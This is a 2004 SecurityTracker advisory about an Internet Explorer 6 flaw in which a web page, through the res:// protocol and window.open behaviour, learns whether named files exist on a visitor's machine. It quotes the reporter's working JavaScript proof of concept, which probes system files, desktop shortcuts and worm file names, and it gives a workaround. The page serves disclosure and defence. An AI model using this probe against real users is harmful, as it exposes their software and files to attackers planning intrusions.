SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Microsoft Internet Explorer Vendors:   Microsoft
Microsoft IE Discloses Whether Specified Files Exist to Remote Users
SecurityTracker Alert ID:  1012138
SecurityTracker URL:  http://securitytracker.com/id/1012138
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 8 2004
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 6.00.2800
Description:   A vulnerability was reported in Microsoft Internet Explorer (IE). A remote user can determine if files exist in certain system directories.

Benjamin Tobias Franz reported that a remote user can create scripting code that, when loaded by the target user, will determine whether specified files exist in the WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer, and c:\ directories.

On some versions of IE, when using the 'res://' protocol to attempt to open a file, IE will open a new window if the specified file does not exist but not if the file exists. The scripting code can test this condition to determine if the file exists or not.

[Editor's note: We could not reproduce the results on 6.00.2900.]

Impact:   A remote user can determine if specified files in certain system directories exist on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Microsoft Internet Explorer permits to examine the existence of local files


Microsoft Internet Explorer permits to examine the existence of local files


Description:
There is a security bug in Microsoft Internet Explorer, which allows to
check up existence of local files in system directories (Root (C:/),
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).
Successful exploitation allows the author of a malicious web site to plan
attacks against the target computer.
The bug occurs, because Microsoft Internet Explorer does not open a window,
if the target file exists; but it will open a window, if the file does not
exist.
Also an attacker can use this "feature" to verify existence of local files
(e.g. system files, malware files, shortcuts on Desktop, ...).

Affected software:
Microsoft Internet Explorer

Workaround:
Deactivate "Active Scripting" in the IE options menu.

Proof-of-Concept exploit:

<textarea id="btft" rows="10" cols="75"></textarea><br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="&gt; Search &gt;"
onClick="alert('File '+btfc(document.all.btfn.value));">

<script>

// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer

function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search");}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!\n";
else return "'"+btfp+"' does NOT exist!\n";}

var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...\n";
btfd+=btfc("autoexec.bat");
btfd+=btfc("msdos.sys");
btfd+=btfc("twain.dll");
btfd+=btfc("swflash.ocx");
btfd+=btfc("shell32.dll");
btfd+=btfc("test.txt");
btfd+=btfc("test.btf");
btfd+="\nSearch for shortcut files (on desktop) ...\n";
btfd+=btfc("Microsoft Word.lnk");
btfd+=btfc("IrfanView.lnk");
btfd+=btfc("Opera.lnk");
btfd+=btfc("Mozilla.lnk");
btfd+=btfc("Netscape 6.lnk");
btfd+=btfc("Netscape 7.lnk");
btfd+=btfc("btf.lnk");
btfd+="\nSearch for virus/worm files ...\n";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");
btfd+=btfv+"Klez' : "+btfc("wqk.exe");
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");
btfd+=btfv+"Maldal' : "+btfc("win.exe");
btfd+=btfv+"Gokar' : "+btfc("karen.exe");

// ...

document.all.btft.value=
"Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)\n\n"+
btfd;
</script>


Date of discovery:
06. November 2004


Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all
patches installed on Windows 98.


My DLL versions:

MSHTML.DLL: 6.00.2800.1477
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)
URLMON.DLL: 6.00.2800.1475
WININET.DLL: 6.00.2800.1475


Regards,
Benjamin Tobias Franz
Germany

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC